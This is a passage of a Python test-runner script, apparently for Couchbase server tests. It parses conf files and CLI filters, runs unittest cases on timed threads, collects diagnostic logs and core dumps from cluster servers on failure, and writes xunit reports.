                           "jenkins_build_url>' (or) 'passed=<junit_xml_path (or) "
                           "jenkins_build_url>' or 'file=<filename>' (or) '<regular expression>' "
                           "to exclude tests in the run. Use -g option to search entire conf "
                           "files. e.g. -e 'passed'")
    tgroup.add_option("-r", "--rerun", dest="rerun",
                      help="Rerun fail or pass tests with given =count number of times maximum. "
                           "\ne.g. -r 'fail=3'")
    tgroup.add_option("-g", "--globalsearch", dest="globalsearch",
                      help="Option to get tests from given conf file path pattern, "
                           "like conf/**/*.conf. Useful for include or exclude conf files to "
                           "filter tests. e.g. -g 'conf/**/.conf'",
                      default="")
    tgroup.add_option("-m", "--merge", dest="merge",
                      help="Merge the report files path pattern, like logs/**/.xml. e.g. -m '["
                           "logs/**/*.xml]'",
                      default="")
    parser.add_option_group(tgroup)

    parser.add_option("-p", "--params", dest="params",
                      help="Optional key=value parameters, comma-separated -p k=v,k2=v2,...",
                      default="")
    parser.add_option("-n", "--noop", action="store_true",
                      help="NO-OP - emit test names, but don't actually run them e.g -n true")
    parser.add_option("-l", "--log-level", dest="loglevel", default="INFO",
                      help="e.g -l info,warning,error")
    # NOTE(review): parses sys.argv via parser.parse_args(), not the
    # `argv` parameter — confirm whether argv was ever meant to be used.
    options, args = parser.parse_args()

    tests = []
    test_params = {}

    setLogLevel(options.loglevel)
    log.info("Checking arguments...")
    if not options.ini:
        parser.error("Please specify an .ini file (-i) option.")
        parser.print_help()
    else:
        test_params['ini'] = options.ini
        if not os.path.exists(options.ini):
            sys.exit("ini file {0} was not found".format(options.ini))

    # Cluster name defaults to the ini file's basename without extension.
    test_params['cluster_name'] = splitext(os.path.basename(options.ini))[0]

    if not options.testcase and not options.conf and not options.globalsearch and not options.include_tests and not options.exclude_tests:
        parser.error("Please specify a configuration file (-c) or a test case (-t) or a globalsearch (-g) option.")
        parser.print_help()
    # -g takes precedence over -c; include/exclude filters are applied
    # after the test list is gathered, then -t names are appended last.
    if options.conf and not options.globalsearch:
        parse_conf_file(options.conf, tests, test_params)
    if options.globalsearch:
        parse_global_conf_file(options.globalsearch, tests, test_params)
    if options.include_tests:
        tests = process_include_or_filter_exclude_tests("include", options.include_tests, tests,
                                                        options)
    if options.exclude_tests:
        tests = process_include_or_filter_exclude_tests("exclude", options.exclude_tests, tests, options)
    if options.testcase:
        tests.append(options.testcase)
    if options.noop:
        # Dry run: list the selected tests and exit.
        print(("---\n"+"\n".join(tests)+"\n---\nTotal="+str(len(tests))))
        sys.exit(0)

    return tests, test_params, options.ini, options.params, options
def setLogLevel(log_level):
    """Set the module logger's level from a case-insensitive level name.

    Unknown or empty names fall back to ``logging.NOTSET``.
    """
    named_levels = {
        'info': logging.INFO,
        'warning': logging.WARNING,
        'debug': logging.DEBUG,
        'critical': logging.CRITICAL,
        'fatal': logging.FATAL,
    }
    normalized = log_level.lower() if log_level else ''
    log.setLevel(named_levels.get(normalized, logging.NOTSET))
def process_include_or_filter_exclude_tests(filtertype, option, tests, options):
    """Filter ``tests`` according to an include/exclude option value.

    ``option`` may be 'failed'/'passed' (optionally '=<xml path or jenkins
    URL>'), a bare http(s) URL, 'file=<path>', or a regular expression.
    For filtertype 'include' the matching set replaces ``tests``; for
    'exclude' matches are removed from ``tests``. Returns the resulting
    list (``tests`` may also be mutated in place for the exclude paths).
    """
    if filtertype == 'include' or filtertype == 'exclude':
        # Branch 1: pass/fail status from a previous run's result XML.
        if option.startswith('failed') or option.startswith('passed') or option.startswith("http://") or option.startswith("https://"):
            passfail = option.split("=")
            tests_list = []
            if len(passfail) == 2:
                # 'failed=<path-or-url>' / 'passed=<path-or-url>'
                if passfail[1].startswith("http://") or passfail[1].startswith("https://"):
                    tp, tf = parse_testreport_result_xml(passfail[1])
                else:
                    tp, tf = parse_junit_result_xml(passfail[1])
                    if not tp and not tf:
                        # junit parse found nothing; try testReport format.
                        tp, tf = parse_testreport_result_xml(passfail[1])
            elif option.startswith("http://") or option.startswith("https://"):
                tp, tf = parse_testreport_result_xml(option)
                tests_list=tp+tf
            else:
                # Bare 'failed'/'passed': use default logs/**/*.xml glob.
                tp, tf = parse_junit_result_xml()
                if not tp and not tf:
                    tp, tf = parse_testreport_result_xml()
            if tp is None and tf is None:
                # Result download/parse failed entirely; leave tests as-is.
                return tests
            if option.startswith('failed') and tf:
                tests_list = tf
            elif option.startswith('passed') and tp:
                tests_list = tp
            if filtertype == 'include':
                tests = tests_list
            else:
                # Exclude: remove param-insensitive matches from tests.
                for line in tests_list:
                    isexisted, t = check_if_exists_with_params(tests, line, options.params)
                    if isexisted:
                        tests.remove(t)
        # Branch 2: explicit list of test lines in a file.
        elif option.startswith("file="):
            filterfile = locate_conf_file(option.split("=")[1])
            if filtertype == 'include':
                tests_list = []
                if filterfile:
                    for line in filterfile:
                        tests_list.append(line.strip())
                tests = tests_list
            else:
                # NOTE(review): filterfile may be None here (missing file)
                # which would raise TypeError — confirm intended.
                for line in filterfile:
                    isexisted, t = check_if_exists_with_params(tests, line.strip(), options.params)
                    if isexisted:
                        tests.remove(t)
        # Branch 3: treat the option as a regular expression.
        else:  # pattern
            if filtertype == 'include':
                tests = [i for i in tests if re.search(option, i)]
            else:
                tests = [i for i in tests if not re.search(option, i)]
    else:
        log.warning("Warning: unknown filtertype given (only include/exclude supported)!")
    return tests
def create_log_file(log_config_file_name, log_file_name, level):
    """Render a per-test logging config from the ``logging.conf.sample`` template.

    Substitutes the ``@@LEVEL@@`` and ``@@FILENAME@@`` placeholders and
    writes the result to ``log_config_file_name``.

    Args:
        log_config_file_name: Destination path for the rendered config.
        log_file_name: Log file path substituted for ``@@FILENAME@@``
            (backslashes normalized to forward slashes).
        level: Logging level name substituted for ``@@LEVEL@@``.
    """
    # Normalize Windows path separators once, outside the loop.
    normalized_log_path = log_file_name.replace('\\', '/')
    # Context managers close both handles even if a read/write fails
    # (the original leaked them on error; truncate() after "w" was also
    # redundant since "w" already truncates).
    with open("logging.conf.sample") as tmpl_log_file, \
            open(log_config_file_name, "w") as log_file:
        for line in tmpl_log_file:
            newline = line.replace("@@LEVEL@@", level)
            newline = newline.replace("@@FILENAME@@", normalized_log_path)
            log_file.write(newline)
def append_test(tests, name):
    """Append ``name`` to ``tests``, expanding a trailing wildcard.

    A name containing ``*`` (not in the first position) is expanded into
    the individual test methods of the referenced module/class via the
    ``unittest`` loader. A handful of tests whose names carry special
    characters are always taken literally.
    """
    prefix = ".".join(name.split(".")[0:-1])
    # Tests with special chars in their names: never wildcard-expand.
    literal_markers = (
        "test_restore_with_filter_regex",
        "test_restore_with_rbac",
        "test_backup_with_rbac",
        "test_add_node_with_cert_diff_services",
        "test_add_nodes_x509_rebalance",
        "test_init_nodes_x509",
    )
    expandable = all(marker not in name for marker in literal_markers)
    if expandable and name.find('*') > 0:
        loaded = unittest.TestLoader().loadTestsFromName(name.rstrip('.*'))
        for test_obj in loaded:
            tests.append(prefix + '.' + test_obj._testMethodName)
    else:
        tests.append(name)
def locate_conf_file(filename):
    """Return an open handle to a conf file, looking in cwd then conf/.

    Returns None when ``filename`` is empty or neither candidate exists.
    The caller owns (and must close) the returned file object.
    """
    log.info("Conf filename: %s" % filename)
    if not filename:
        return None
    candidates = (filename, "conf{0}{1}".format(os.sep, filename))
    for candidate in candidates:
        if os.path.exists(candidate):
            return open(candidate)
    return None
def parse_conf_file(filename, tests, params):
    """Parse a configuration file.

    Configuration files contain information and parameters about test
    execution. Should follow the following order:

    Part1: Tests to execute.
    Part2: Parameters to override the defaults.

    @e.x:
        TestModuleName1:
            TestName1
            TestName2
            ....
        TestModuleName2.TestName3
        TestModuleName2.TestName4
        ...
        params:
            items=4000000
            num_creates=400000
            ....
    """
    f = locate_conf_file(filename)
    if not f:
        usage("unable to locate configuration file: " + filename)
    prefix = None
    for line in f:
        stripped = line.strip()
        # Skip comments and blank lines.
        if stripped.startswith("#") or len(stripped) <= 0:
            continue
        # A line ending in ':' opens a new section (test module prefix,
        # or the special 'params' section).
        if stripped.endswith(":"):
            prefix = stripped.split(":")[0]
            log.info("Test prefix: {0}".format(prefix))
            continue
        name = stripped
        if prefix and prefix.lower() == "params":
            # Inside 'params': each line is a key=value override.
            args = stripped.split("=", 1)
            if len(args) == 2:
                params[args[0]] = args[1]
            continue
        elif line.startswith(" ") and prefix:
            # Indented line under a module section: qualify with prefix.
            name = prefix + "." + name
        # Remember this test's module path as the prefix for subsequent
        # indented lines (params after the first comma are dropped).
        prefix = ".".join(name.split(",")[0].split('.')[0:-1])
        append_test(tests, name)

    # If spec parameter isn't defined, testrunner uses the *.conf filename for
    # the spec value
    if 'spec' not in params:
        params['spec'] = splitext(basename(filename))[0]

    params['conf_file'] = filename
def parse_global_conf_file(dirpath, tests, params):
    """Expand ``dirpath`` (a directory or a glob pattern) and feed every
    matching .conf file through parse_conf_file."""
    log.info("dirpath="+dirpath)
    if os.path.isdir(dirpath):
        # A plain directory becomes a recursive *.conf pattern.
        dirpath = dirpath + os.sep + "**" + os.sep + "*.conf"
        log.info("Global filespath=" + dirpath)
    for conf_path in glob.glob(dirpath):
        parse_conf_file(conf_path, tests, params)
def check_if_exists(test_list, test_line):
    """Order-insensitive membership test.

    Two lines are considered equal when their sorted character sequences
    match (i.e. they are anagrams — field order does not matter).
    Returns ``(True, matching_entry)`` on a hit, else ``(False, "")``.
    """
    target = ''.join(sorted(test_line))
    for candidate in test_list:
        if ''.join(sorted(candidate)) == target:
            return True, candidate
    return False, ""
def check_if_exists_with_params(test_list, test_line, test_params):
    """Like check_if_exists, but each candidate is compared with
    ``test_params`` appended as ``",<params>"`` when params are given.

    Returns ``(True, original_entry)`` on a hit, else ``(False, "")``.
    """
    target = ''.join(sorted(test_line))
    for candidate in test_list:
        if test_params:
            augmented = candidate + "," + test_params.strip()
        else:
            augmented = candidate
        if ''.join(sorted(augmented)) == target:
            return True, candidate
    return False, ""
def transform_and_write_to_file(tests_list, filename):
    """Clean and deduplicate test lines, then persist them.

    Each line is stripped of bookkeeping fields via filter_fields,
    trailing commas removed, and duplicates dropped (order-insensitively,
    via check_if_exists). The surviving lines are written one-per-line to
    ``filename`` and returned as a list.
    """
    deduped = []
    for raw in tests_list:
        cleaned = filter_fields(raw).rstrip(",")
        exists, _ = check_if_exists(deduped, cleaned)
        if not exists:
            deduped.append(cleaned)
    with open(filename, "w+") as out:
        for entry in deduped:
            out.write(entry + "\n")
    return deduped
def getNodeText(nodelist):
    """Concatenate the text content of all TEXT_NODE entries in ``nodelist``."""
    return ''.join(node.data for node in nodelist
                   if node.nodeType == node.TEXT_NODE)
def parse_testreport_result_xml(filepath=""):
    """Parse Jenkins testReport-style XML into passed/failed name lists.

    ``filepath`` may be a local path/glob, a direct .xml URL, or a Jenkins
    build URL (the testReport API XML is then downloaded to logs/). An
    empty value falls back to the ``logs/**/*.xml`` glob. Returns
    ``(passed_tests, failed_tests)`` after de-duplication (also written to
    passed_tests.conf / failed_tests.conf), or ``(None, None)`` when a
    download fails.
    """
    if filepath.startswith("http://") or filepath.startswith("https://"):
        if filepath.endswith(".xml"):
            url_path = filepath
        else:
            # Build URL: append the Jenkins testReport API suffix.
            url_path = filepath+"/testReport/api/xml?pretty=true"
        jobnamebuild = filepath.split('/')
        if not os.path.exists('logs'):
            os.mkdir('logs')
        # Local file name derived from the last three URL segments.
        # NOTE(review): ''.join(os.sep) is just os.sep.
        newfilepath = 'logs'+''.join(os.sep)+'_'.join(jobnamebuild[-3:])+"_testresult.xml"
        log.info("Downloading " + url_path +" to "+newfilepath)
        try:
            filedata = urllib.request.urlopen(url_path)
            datatowrite = filedata.read()
            filepath = newfilepath
            with open(filepath, 'wb') as f:
                f.write(datatowrite)
        except Exception as ex:
            log.error("Error:: "+str(ex)+"! Please check if " +
                      url_path + " URL is accessible!!")
            log.info("Running all the tests instead for now.")
            return None, None
    if filepath == "":
        filepath = "logs/**/*.xml"
    log.info("Loading result data from "+filepath)
    xml_files = glob.glob(filepath)
    passed_tests=[]
    failed_tests=[]
    for xml_file in xml_files:
        log.info("-- "+xml_file+" --")
        doc = xml.dom.minidom.parse(xml_file)
        testresultelem = doc.getElementsByTagName("testResult")
        testsuitelem = testresultelem[0].getElementsByTagName("suite")
        for ts in testsuitelem:
            testcaseelem = ts.getElementsByTagName("case")
            for tc in testcaseelem:
                tcname = getNodeText((tc.getElementsByTagName("name")[0]).childNodes)
                tcstatus = getNodeText((tc.getElementsByTagName("status")[0]).childNodes)
                # Anything other than an explicit PASSED counts as failed.
                # NOTE(review): the `failed` local is assigned but never
                # read — appears vestigial.
                if tcstatus == 'PASSED':
                    failed=False
                    passed_tests.append(tcname)
                else:
                    failed=True
                    failed_tests.append(tcname)
    if failed_tests:
        failed_tests = transform_and_write_to_file(failed_tests,"failed_tests.conf")
    if passed_tests:
        passed_tests = transform_and_write_to_file(passed_tests, "passed_tests.conf")
    return passed_tests, failed_tests
def parse_junit_result_xml(filepath=""):
    """Parse junit-style report XML into passed/failed test-name lists.

    Args:
        filepath: Path or glob of report XML files. An http(s) URL is
            delegated to parse_testreport_result_xml; an empty value falls
            back to the ``logs/**/*.xml`` glob.

    Returns:
        ``(passed_tests, failed_tests)`` after de-duplication; both lists
        are also written to passed_tests.conf / failed_tests.conf.
    """
    if filepath.startswith("http://") or filepath.startswith("https://"):
        return parse_testreport_result_xml(filepath)
    if filepath == "":
        filepath = "logs/**/*.xml"
    log.info("Loading result data from "+filepath)
    xml_files = glob.glob(filepath)
    passed_tests = []
    failed_tests = []
    for xml_file in xml_files:
        log.info("-- "+xml_file+" --")
        doc = xml.dom.minidom.parse(xml_file)
        testsuitelem = doc.getElementsByTagName("testsuite")
        for ts in testsuitelem:
            testcaseelem = ts.getElementsByTagName("testcase")
            for tc in testcaseelem:
                tcname = tc.getAttribute("name")
                tcerror = tc.getElementsByTagName("error")
                # BUG FIX: reset the failure flag per test case. It was
                # previously initialized once per suite, so every case
                # after the first failing one in a suite was misclassified
                # and dropped from passed_tests.
                failed = False
                for tce in tcerror:
                    failed_tests.append(tcname)
                    failed = True
                if not failed:
                    passed_tests.append(tcname)
    if failed_tests:
        failed_tests = transform_and_write_to_file(failed_tests,"failed_tests.conf")
    if passed_tests:
        passed_tests = transform_and_write_to_file(passed_tests, "passed_tests.conf")
    return passed_tests, failed_tests
def create_headers(username, password):
    """Build HTTP request headers carrying Basic authentication.

    Args:
        username: REST username.
        password: REST password.

    Returns:
        Dict of headers with Content-Type, Authorization and Accept set.

    Uses ``base64.b64encode`` instead of ``base64.encodebytes``: the
    latter inserts a newline every 76 characters, which would corrupt the
    Authorization header for credentials longer than ~57 bytes (the old
    ``rstrip('\\n')`` only removed the trailing newline).
    """
    credentials = '%s:%s' % (username, password)
    authorization = base64.b64encode(credentials.encode()).decode()
    return {'Content-Type': 'application/x-www-form-urlencoded',
            'Authorization': 'Basic %s' % authorization,
            'Accept': '*/*'}
def get_server_logs(input, path):
    """Download the /diag endpoint of every server and store it gzipped.

    For each server in ``input.servers`` the diag URL is fetched with
    Basic auth, streamed to ``<path>/<ip>-diag.txt``, gzipped to
    ``<path>/<ip>-diag.txt.gz``, and the plain file removed. Failures are
    logged per server and do not abort the loop.

    Args:
        input: TestInput-like object with ``servers`` and
            ``membase_settings`` (rest credentials).
        path: Directory to write the diag files into.
    """
    for server in input.servers:
        # Fixed: the original called .format() on a string with no
        # placeholder, so the server IP never appeared in the message.
        log.info("grabbing diags from {0}".format(server.ip))
        diag_url = "http://{0}:{1}/diag".format(server.ip, server.port)
        log.info(diag_url)
        try:
            req = urllib.request.Request(diag_url)
            req.headers = create_headers(input.membase_settings.rest_username,
                                         input.membase_settings.rest_password)
            filename = "{0}/{1}-diag.txt".format(path, server.ip)
            page = urllib.request.urlopen(req, timeout=60)
            with open(filename, 'wb') as output:
                os.write(1, "downloading {0} ...".format(str(server.ip)).encode())
                # Stream in 64 KiB chunks to keep memory bounded.
                while True:
                    buffer = page.read(65536)
                    if not buffer:
                        break
                    output.write(buffer)
                    os.write(1, ".".encode())
            # Gzip the download, then drop the uncompressed copy.
            # Context managers ensure both handles close even on error.
            with open(filename, 'rb') as file_input, \
                    gzip.open("{0}.gz".format(filename), 'wb') as zipped:
                zipped.writelines(file_input)
            os.remove(filename)
            log.info("downloaded and zipped diags @ : {0}".format("{0}.gz".format(filename)))
        except urllib.error.URLError:
            log.error("unable to obtain diags from %s" % diag_url)
        except BadStatusLine:
            log.error("unable to obtain diags from %s" % diag_url)
        except Exception as e:
            log.error("unable to obtain diags from %s %s" % (diag_url, e))
def get_logs_cluster_run(input, path, ns_server_path):
    """Archive a cluster_run's ns_server/logs directory into <path>/logs.zip.

    Best effort: failures are only logged, never raised.
    """
    print("grabbing logs (cluster-run)")
    dest_dir = path or "."
    source_dir = ns_server_path + os.sep + "logs"
    try:
        shutil.make_archive(dest_dir + os.sep + "logs", 'zip', source_dir)
    except Exception as e:
        log.error("NOT POSSIBLE TO GRAB LOGS (CLUSTER_RUN)")
def get_cbcollect_info(input, path):
    """Run cbcollect_info against every server; log per-server failures."""
    collector = cbcollectRunner(input.servers, path)
    collector.run()
    for (server, e) in collector.fail:
        log.error("NOT POSSIBLE TO GRAB CBCOLLECT FROM {0}: {1}".format(server.ip, e))
def get_couch_dbinfo(input, path):
    """Collect couch dbinfo from every server (best effort; errors logged)."""
    for server in input.servers:
        print(("grabbing dbinfo from {0}".format(server.ip)))
        dest = path or "."
        try:
            couch_dbinfo_Runner(server, dest).run()
        except Exception as e:
            log.error("NOT POSSIBLE TO GRAB dbinfo FROM {0}: {1}".format(server.ip, e))
def clear_old_core_dumps(_input, path):
    """Remove pre-existing core dumps on every server (best effort)."""
    for server in _input.servers:
        dest = path or "."
        try:
            Clearcoredumps(server, dest).run()
        except Exception as e:
            log.error("Unable to clear core dumps on {0} : {1}".format(server.ip, e))
def get_core_dumps(_input, path):
    """Collect core dump files from all servers.

    Returns True when at least one server reported new core dumps;
    per-server failures are logged and skipped.
    """
    found_any = False
    for server in _input.servers:
        print(("grabbing core dumps files from {0}".format(server.ip)))
        dest = path or "."
        try:
            if Getcoredumps(server, dest).run():
                found_any = True
        except Exception as e:
            log.error("NOT POSSIBLE TO GRAB CORE DUMPS FROM {0} : {1}".format(server.ip, e))
    return found_any
class StoppableThreadWithResult(Thread):
    """Thread that captures its target's return value and supports a
    cooperative stop flag.

    ``join()`` returns whatever the target returned (None if the thread
    has not finished). The thread itself has to check regularly for the
    stopped() condition.
    """

    def __init__(self, group=None, target=None, name=None,
                 args=(), kwargs=None, verbose=None):
        # `verbose` is kept for call-site compatibility; Python 3's
        # threading.Thread no longer accepts it.
        super(StoppableThreadWithResult, self).__init__(
            group=group, target=target, name=name, args=args, kwargs=kwargs)
        self._stopper = Event()
        # Fixed: initialize the result slot so join() before/without run()
        # returns None instead of raising AttributeError.
        self._return = None

    def stopit(self):
        """Signal the thread to stop (cooperative; the target must poll
        stopped())."""
        self._stopper.set()
        # Fixed: the original also called self._Thread__stop(), a private
        # Python 2 API that no longer exists on Python 3 (this file
        # requires 3.7.6+) and always raised AttributeError.

    def stopped(self):
        """Return True once stopit() has been called."""
        return self._stopper.is_set()

    def run(self):
        if self._target is not None:
            self._return = self._target(*self._args, **self._kwargs)

    def join(self, timeout=None):
        """Join the thread and return the target's result.

        Fixed: the original hardcoded ``timeout=None`` in the inner join,
        silently ignoring the caller's timeout (so runtests'
        ``test_timeout`` never took effect).
        """
        Thread.join(self, timeout=timeout)
        return self._return
def runtests(names, options, arg_i, arg_p, runtime_test_params):
    """Execute the selected tests one by one and collect results.

    For each test: applies GROUP/EXCLUDE_GROUP filters, sets up a
    per-test log directory and logging config, runs the optional
    suite_setUp (first case only), runs the test on a stoppable worker
    thread (honoring ``test_timeout``), optionally collects core dumps /
    server logs / cbcollect / dbinfo on failure, and records the outcome
    in an xunit report.

    Returns ``(results, xunit, report_path)`` where results is a list of
    {"result", "name", ...} dicts.
    """
    log.info("\nNumber of tests initially selected before GROUP filters: " + str(len(names)))
    BEFORE_SUITE = "suite_setUp"
    AFTER_SUITE = "suite_tearDown"
    xunit = XUnitTestResult()
    # Create root logs directory
    abs_path = os.path.dirname(os.path.abspath(sys.argv[0]))
    # Create testrunner logs subdirectory
    str_time = time.strftime("%y-%b-%d_%H-%M-%S", time.localtime())
    root_log_dir = os.path.join(abs_path, "logs{0}testrunner-{1}".format(os.sep, str_time))
    if not os.path.exists(root_log_dir):
        os.makedirs(root_log_dir)
    results = []
    case_number = 1
    last_case_fail = False
    base_tear_down_run = TestInputSingleton.input.param('teardown_run', False)
    if "GROUP" in runtime_test_params:
        print(("Only cases in GROUPs '{0}' will be executed".format(runtime_test_params["GROUP"])))
    if "EXCLUDE_GROUP" in runtime_test_params:
        print(("Cases from GROUPs '{0}' will be excluded".format(runtime_test_params["EXCLUDE_GROUP"])))

    if TestInputSingleton.input.param("get-delays", False):
        # start measure_sched_delays on all servers
        sd = SchedDelays(TestInputSingleton.input.servers)
        sd.start_measure_sched_delays()

    if TestInputSingleton.input.param("hanging_threads", False):
        # Optional third-party watchdog that dumps stacks of frozen threads.
        print("--> hanging_threads: start monitoring...")
        from hanging_threads import start_monitoring
        hanging_threads_frozen_time = int(TestInputSingleton.input.param("hanging_threads", 120))
        hanging_threads_test_interval = int(TestInputSingleton.input.param("test_interval", 1000))
        monitoring_thread = start_monitoring(seconds_frozen=hanging_threads_frozen_time, test_interval=hanging_threads_test_interval)

    logs_folder="."
    test_exec_count=0
    for name in names:
        start_time = time.time()

        # Split "module.Class.test,k1=v1,k2=v2" into the per-test params.
        argument_split = [a.strip() for a in re.split("[,]?([^,=]+)=", name)[1:]]
        params = dict(list(zip(argument_split[::2], argument_split[1::2])))

        # Note that if ALL is specified at runtime then tests which have no groups are still run - just being
        # explicit on this

        if "GROUP" in runtime_test_params and "ALL" not in runtime_test_params["GROUP"].split(";"):
            if 'GROUP' not in params:         # params is the .conf file parameters.
                # this test is not in any groups so we do not run it
                print(("test '{0}' skipped, a group was requested and this is not any groups".format(name)))
                continue

            # there is a group for this test case, if that group is not specified at run time then do not run it
            elif not set(runtime_test_params["GROUP"].split(";")).issubset(set(params["GROUP"].split(";"))):
                print(("test '{0}' skipped, is not in the requested group".format(name)))
                continue
            else:
                pass # the test was in requested group, will run it

        elif "EXCLUDE_GROUP" in runtime_test_params:
            if 'GROUP' in params and \
                set(runtime_test_params["EXCLUDE_GROUP"].split(";")).issubset(set(params["GROUP"].split(";"))):
                print(("test '{0}' skipped, is in an excluded group".format(name)))
                continue

        log.info("--> Running test: {}".format(name))
        test_exec_count += 1
        # Create Log Directory
        logs_folder = os.path.join(root_log_dir, "test_%s" % case_number)
        log.info("Logs folder: {}".format(logs_folder))
        os.mkdir(logs_folder)
        test_log_file = os.path.join(logs_folder, "test.log")
        log_config_filename = r'{0}'.format(os.path.join(logs_folder, "test.logging.conf"))
        create_log_file(log_config_filename, test_log_file, options.loglevel)
        logging.config.fileConfig(log_config_filename)
        print(("Logs will be stored at {0}".format(logs_folder)))
        print(("\n.{3}testrunner -i {0} -p {1} -t {2}\n"\
              .format(arg_i or "", arg_p or "", name, os.sep)))
        # Drop the inline params; keep only the dotted test name.
        name = name.split(",")[0]

        # Update the test params for each test
        TestInputSingleton.input.test_params = params
        TestInputSingleton.input.test_params.update(runtime_test_params)
        TestInputSingleton.input.test_params["case_number"] = case_number
        TestInputSingleton.input.test_params["last_case_fail"] = \
            str(last_case_fail)
        TestInputSingleton.input.test_params["teardown_run"] = \
            str(base_tear_down_run)
        TestInputSingleton.input.test_params["logs_folder"] = logs_folder
        print("Test Input params:")
        print((TestInputSingleton.input.test_params))
        if "get-coredumps" in TestInputSingleton.input.test_params:
            if TestInputSingleton.input.param("get-coredumps", True):
                # Remove stale dumps so post-test detection only sees new ones.
                clear_old_core_dumps(TestInputSingleton.input, logs_folder)
        if case_number == 1 and "upgrade" not in name and "xdcr" not in name:
            # Run the module-level suite_setUp once, before the first case.
            before_suite_name = "%s.%s" % (name[:name.rfind('.')], BEFORE_SUITE)
            try:
                print(("Run before suite setup for %s" % name))
                suite = unittest.TestLoader().loadTestsFromName(before_suite_name)
                print(("-->before_suite_name:{},suite: {}".format(before_suite_name,suite)))
                result = unittest.TextTestRunner(verbosity=2).run(suite)
                print(("-->result: {}".format(result)))
                if "get-coredumps" in TestInputSingleton.input.test_params:
                    if TestInputSingleton.input.param("get-coredumps", True):
                        if get_core_dumps(TestInputSingleton.input, logs_folder):
                            # New core dumps => force a synthetic failure result.
                            result = unittest.TextTestRunner(verbosity=2)._makeResult()
                            result.errors = [(name, "Failing test : new core dump(s) "
                                                    "were found and collected."
                                                    " Check testrunner logs folder.")]
                            log.info("FAIL: New core dump(s) was found and collected")
            except AttributeError as ex:
                # NOTE(review): `traceback` is not imported in the visible
                # file header — confirm it is imported elsewhere.
                traceback.print_exc()
                pass
        try:
            suite = unittest.TestLoader().loadTestsFromName(name)
        except AttributeError as e:
            print(("Test {0} was not found: {1}".format(name, e)))
            result = unittest.TextTestRunner(verbosity=2)._makeResult()
            result.errors = [(name, str(e))]
        except SyntaxError as e:
            print(("SyntaxError in {0}: {1}".format(name, e)))
            result = unittest.TextTestRunner(verbosity=2)._makeResult()
            result.errors = [(name, str(e))]
        else:
            test_timeout = TestInputSingleton.input.param("test_timeout", None)
            # NOTE(review): args=(suite) is NOT a tuple — this relies on
            # TestSuite being iterable when Thread unpacks *args; should
            # probably be args=(suite,).
            t = StoppableThreadWithResult(target=unittest.TextTestRunner(verbosity=2).run,
                                          name="test_thread",
                                          args=(suite))
            t.start()
            result = t.join(timeout=test_timeout)
            if "get-coredumps" in TestInputSingleton.input.test_params:
                if TestInputSingleton.input.param("get-coredumps", True):
                    if get_core_dumps(TestInputSingleton.input, logs_folder):
                        result = unittest.TextTestRunner(verbosity=2)._makeResult()
                        result.errors = [(name, "Failing test : new core dump(s) "
                                                "were found and collected."
                                                " Check testrunner logs folder.")]
                        log.info("FAIL: New core dump(s) was found and collected")
            if not result:
                # Join timed out: kill leftover threads and record a timeout.
                # NOTE(review): _Thread__stop does not exist on Python 3 —
                # this would raise AttributeError if ever reached; confirm.
                for t in threading.enumerate():
                    if t != threading.current_thread():
                        t._Thread__stop()
                result = unittest.TextTestRunner(verbosity=2)._makeResult()
                case_number += 1000
                print ("========TEST WAS STOPPED DUE TO TIMEOUT=========")
                result.errors = [(name, "Test was stopped due to timeout")]
        time_taken = time.time() - start_time

        # Concat params to test name
        # To make tests more readable
        params = ''
        if TestInputSingleton.input.test_params:
            for key, value in list(TestInputSingleton.input.test_params.items()):
                if key and value:
                    params += "," + str(key) + "=" + str(value)

        base_tear_down_run = TestInputSingleton.input.param(
            'teardown_run', False)
        if result.failures or result.errors:
            # Immediately get the server logs, if
            # the test has failed or has errors
            last_case_fail = True
            if "get-logs" in TestInputSingleton.input.test_params:
                get_server_logs(TestInputSingleton.input, logs_folder)

            if "get-logs-cluster-run" in TestInputSingleton.input.test_params:
                if TestInputSingleton.input.param("get-logs-cluster-run", True):
                    # Generate path to ns_server directory
                    ns_server_path = os.path.normpath(abs_path + os.sep + os.pardir + os.sep + "ns_server")
                    get_logs_cluster_run(TestInputSingleton.input, logs_folder, ns_server_path)

            if "get-cbcollect-info" in TestInputSingleton.input.test_params:
                if TestInputSingleton.input.param("get-cbcollect-info", True):
                    get_cbcollect_info(TestInputSingleton.input, logs_folder)

            if "get-couch-dbinfo" in TestInputSingleton.input.test_params and \
                    TestInputSingleton.input.param("get-couch-dbinfo", True):
                get_couch_dbinfo(TestInputSingleton.input, logs_folder)

            # Only the first failure and the first error are reported.
            errors = []
            for failure in result.failures:
                test_case, failure_string = failure
                errors.append(failure_string)
                break
            for error in result.errors:
                test_case, error_string = error
                errors.append(error_string)
                break
            xunit.add_test(name=name, status='fail', time=time_taken,
                           errorType='membase.error', errorMessage=str(errors),
                           params=params)
            results.append({"result": "fail", "name": name})
        else:
            last_case_fail = False
            xunit.add_test(name=name, time=time_taken, params=params)
            results.append({"result": "pass", "name": name, "time": time_taken})
        # Report is rewritten after every case so partial runs have output.
        xunit.write("{0}{2}report-{1}".format(os.path.dirname(logs_folder), str_time, os.sep))
        xunit.print_summary()
        print(("testrunner logs, diags and results are available under {0}".format(logs_folder)))
        case_number += 1
        if (result.failures or result.errors) and \
                TestInputSingleton.input.param("stop-on-failure", False):
            print("test fails, all of the following tests will be skipped!!!")
            break

    print("\n*** Tests executed count: {}\n".format(test_exec_count))
    if test_exec_count > 0 and "upgrade" not in name:
        # Run the module-level suite_tearDown of the last executed test.
        after_suite_name = "%s.%s" % (name[:name.rfind('.')], AFTER_SUITE)
        try:
            print(("Run after suite setup for %s" % name))
            suite = unittest.TestLoader().loadTestsFromName(after_suite_name)
            result = unittest.TextTestRunner(verbosity=2).run(suite)
        except AttributeError as ex:
            pass
    if "makefile" not in TestInputSingleton.input.test_params:
        print("During the test, Remote Connections: %s, Disconnections: %s" %
              (RemoteMachineShellConnection.connections,
               RemoteMachineShellConnection.disconnections))

    if TestInputSingleton.input.param("get-delays", False):
        sd.stop_measure_sched_delay()
        sd.fetch_logs()

    # terminate any non main thread - these were causing hangs
    for t in threading.enumerate():
        if t.name != 'MainThread' and t.is_alive():
            print(('Thread', t, 'was not properly terminated, will be terminated now.'))
            if hasattr(t, 'shutdown'):
                print("Shutting down the thread...")
                t.shutdown(True)
            else:
                print("Stopping the thread...")
                try:
                    t._stop()
                except Exception as e:
                    print("Unable to stop hung thread, killing python process")
                    os.kill(os.getpid(), signal.SIGKILL)
    if "makefile" in TestInputSingleton.input.test_params:
        # print out fail for those tests which failed and do sys.exit() error code
        fail_count = 0
        for result in results:
            if result["result"] == "fail":
                print((result["name"], " fail "))
                fail_count += 1
            else:
                print((result["name"], " pass"))
